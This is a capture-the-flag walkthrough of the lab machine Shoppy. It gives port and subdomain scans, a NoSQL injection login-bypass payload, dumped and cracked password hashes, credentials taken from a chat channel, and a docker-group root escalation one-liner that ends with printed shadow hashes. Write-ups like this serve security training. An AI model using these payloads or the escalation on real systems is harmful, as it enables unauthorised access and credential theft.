Basic information

Port scan

Ports 22 and 80 are open:

$ nmap -sC -sV -Pn 10.10.11.180
Starting Nmap 7.93 ( https://nmap.org ) at 2022-09-23 14:50 CST
Nmap scan report for 10.10.11.180
Host is up (0.20s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 9e5e8351d99f89ea471a12eb81f922c0 (RSA)
| 256 5857eeeb0650037c8463d7a3415b1ad5 (ECDSA)
|_ 256 3e9d0a4290443860b3b62ce9bd9a6754 (ED25519)
80/tcp open http nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.53 seconds

Port 80

The server redirects to http://shoppy.htb (see the nmap http-title line), so a hosts entry is needed:

10.10.11.180 shoppy.htb

The site shows a waiting page; the shop is not officially open yet:

Subdomain scan

Subdomain enumeration finds mattermost. This is somewhat wordlist-dependent, so use a reasonably large list. Note that with gobuster 3.2 and later the vhost mode needs --append-domain, otherwise each word is sent as a bare Host header and the subdomain is never matched:

gobuster vhost -u http://shoppy.htb -w ~/Tools/dict/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt

Found: mattermost.shoppy.htb (Status: 200) [Size: 3122]

Directory scan

A simple scan, or ordinary manual enumeration, turns up the login page:

NoSQL injection

The login form is injectable, but not with ordinary SQL injection; it is NoSQL injection. The payload closes the quoted username and appends ||''=='' , a condition that is always true, so the query matches the admin document no matter what password is supplied:

admin'||''=='

The search feature accepts the same payload and returns every user document as JSON, password hashes included. The hashes are 32 hex characters, consistent with unsalted MD5, and josh's password cracks:

[{"_id":"62db0e93d6d6a999a66ee67a","username":"admin","password":"23c6877d9e2b564ef8b32c3a23de27b2"},{"_id":"62db0e93d6d6a999a66ee67b","username":"josh","password":"6ebcea65320589ca4f2f1ce039975995"}]

josh : remembermethisway

mattermost

The josh credentials log into Mattermost, where one of the channels gives jaeger's credentials:

username: jaeger
password: Sh0ppyBest@pp!

user flag

SSH in as jaeger with the recovered credentials:

Privilege escalation enumeration

The information above shows that the path goes through the deploy user first. strings on the program turns up nothing useful, but cat-ing the binary directly, combined with the error message it prints when run, reveals the password. Yes, the password really is Sample.

deploy

Run the program with that password to obtain deploy's password:

Switch to deploy and note that this user is in the docker group. That is effectively root: anyone who can talk to the Docker daemon can mount the host's root filesystem into a container and chroot into it, so this is the standard docker mount privilege escalation. It needs an image that is already present locally (docker images lists them); here alpine is used:

Privilege escalation & root flag

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

shadow (read from the mounted host filesystem; the $y$ prefix marks yescrypt hashes)

root:$y$j9T$0gd6YLeK1QF8eXOhAGmb2.$rvSHnH5qysjj79l0OiXizdnFwT1vsQzz5U4p/vrHQMB:19195:0:99999:7:::
jaeger:$y$j9T$Dd.LPLKhUiqLImmrThQ.m/$zWTCxncUITpaG1GhvvV66fhFWRh2CVz.KtJH4bd1ke.:19195:0:99999:7:::
deploy:$y$j9T$1u25BMNE1Y2tRYy7ne.wg/$mHEZ.4Y9kanC0001s.p5Q8qqzwt9TYgj6nrvaqDlPcB:19195:0:99999:7:::
